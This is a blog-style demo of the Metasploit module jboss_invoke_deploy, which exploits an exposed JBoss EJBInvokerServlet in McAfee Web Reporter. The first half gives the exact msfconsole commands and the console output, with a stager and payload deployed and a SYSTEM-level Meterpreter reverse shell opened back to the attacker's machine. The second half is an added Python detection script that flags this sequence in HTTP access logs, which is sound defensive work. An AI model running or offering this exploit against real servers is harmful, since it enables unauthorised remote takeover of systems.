Metasploit Demo: JBoss DeploymentFileRepository WAR Deployment

Not really a new module, but with the correct settings it can be used to exploit the recently disclosed Apache Tomcat/JBoss EJBInvokerServlet/JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution vulnerability in McAfee Web Reporter 5.2.1. In this case I had much better luck with the Java payloads.

Description:
This module can be used to execute a payload on JBoss servers that have the HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking the methods provided by jboss.admin:DeploymentFileRepository, a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on JBoss 4.x and 5.x.

References:
http://cvedetails.com/cve/2007-1036/
http://secunia.com/community/advisories/55112
http://www.osvdb.org/33744
http://www.redteam-pentesting.de/publications/jboss
http://www.exploit-db.com/exploits/28713/

use exploit/multi/http/jboss_invoke_deploy
set TARGETURI /invoker/EJBInvokerServlet/
set RHOST 192.168.23.172
set RPORT 9111
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.23.174
exploit

[*] Started reverse handler on 192.168.23.174:4444
[*] Attempting to automatically select a target
[*] Attempting to automatically detect the platform
[*] Attempting to automatically detect the architecture
[*] Automatically selected target: "Windows Universal"
[*] Deploying stager
[*] Calling stager: /QAQoJzDmGKHYVJ/BUvtkZBcHzPYhJ.jsp
[*] Uploading payload through stager
[*] Calling payload: /ibFnaehA/ltvkpXyNtZkoUP.jsp
[*] Removing payload through stager
[*] Removing stager
[*] Sending stage (30355 bytes) to 192.168.23.172
[*] Meterpreter session 1 opened (192.168.23.174:4444 -> 192.168.23.172:1098) at 2013-10-13 13:38:23 -0400

meterpreter > getuid
Server username: SYSTEM
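
On the defending side, the sequence in the output above (a POST to an invoker servlet, then requests for JSPs under context paths the server never had) is visible in HTTP access logs. The following is an added detection example, not part of the original post or of Metasploit; it assumes combined-format access logs for the JBoss listener, and the function name, the `known_contexts` parameter and the `/reports` application are hypothetical.

```python
import re

# Combined log format: client, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
INVOKER_RE = re.compile(r'^/invoker/(?:EJB|JMX)InvokerServlet/?$', re.I)
# /<context>/<name>.jsp, the shape of the stager and payload paths in the output above.
JSP_RE = re.compile(r'^/([A-Za-z0-9_-]+)/[A-Za-z0-9_-]+\.jsp$')

def find_invoker_deployments(lines, known_contexts=frozenset()):
    """Flag JSP requests under a context path outside known_contexts made by a
    client that earlier POSTed to an invoker servlet."""
    invoker_posts = {}  # client -> number of invoker POSTs seen so far
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, method, path, status = m.groups()
        path = path.split('?', 1)[0]  # ignore query string
        if method == 'POST' and INVOKER_RE.match(path):
            invoker_posts[client] = invoker_posts.get(client, 0) + 1
            continue
        jsp = JSP_RE.match(path)
        if jsp and invoker_posts.get(client) and jsp.group(1) not in known_contexts:
            findings.append({'client': client, 'jsp': path,
                             'status': int(status),
                             'invoker_posts': invoker_posts[client]})
    return findings

# Constructed sample log lines (not from the original post); the addresses and
# JSP paths reuse the values shown in the console output above.
SAMPLE_LOG = [
    '192.168.23.174 - - [13/Oct/2013:13:38:20 -0400] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 200 512',
    '192.168.23.174 - - [13/Oct/2013:13:38:21 -0400] "GET /QAQoJzDmGKHYVJ/BUvtkZBcHzPYhJ.jsp HTTP/1.1" 200 0',
    '10.0.0.5 - - [13/Oct/2013:13:38:21 -0400] "GET /reports/summary.jsp HTTP/1.1" 200 4096',
    '192.168.23.174 - - [13/Oct/2013:13:38:22 -0400] "GET /ibFnaehA/ltvkpXyNtZkoUP.jsp HTTP/1.1" 200 0',
]

if __name__ == '__main__':
    for f in find_invoker_deployments(SAMPLE_LOG, known_contexts={'reports'}):
        print(f)
```

Populate `known_contexts` from the applications actually deployed on the server so that legitimate JSP traffic from administrative clients is not flagged.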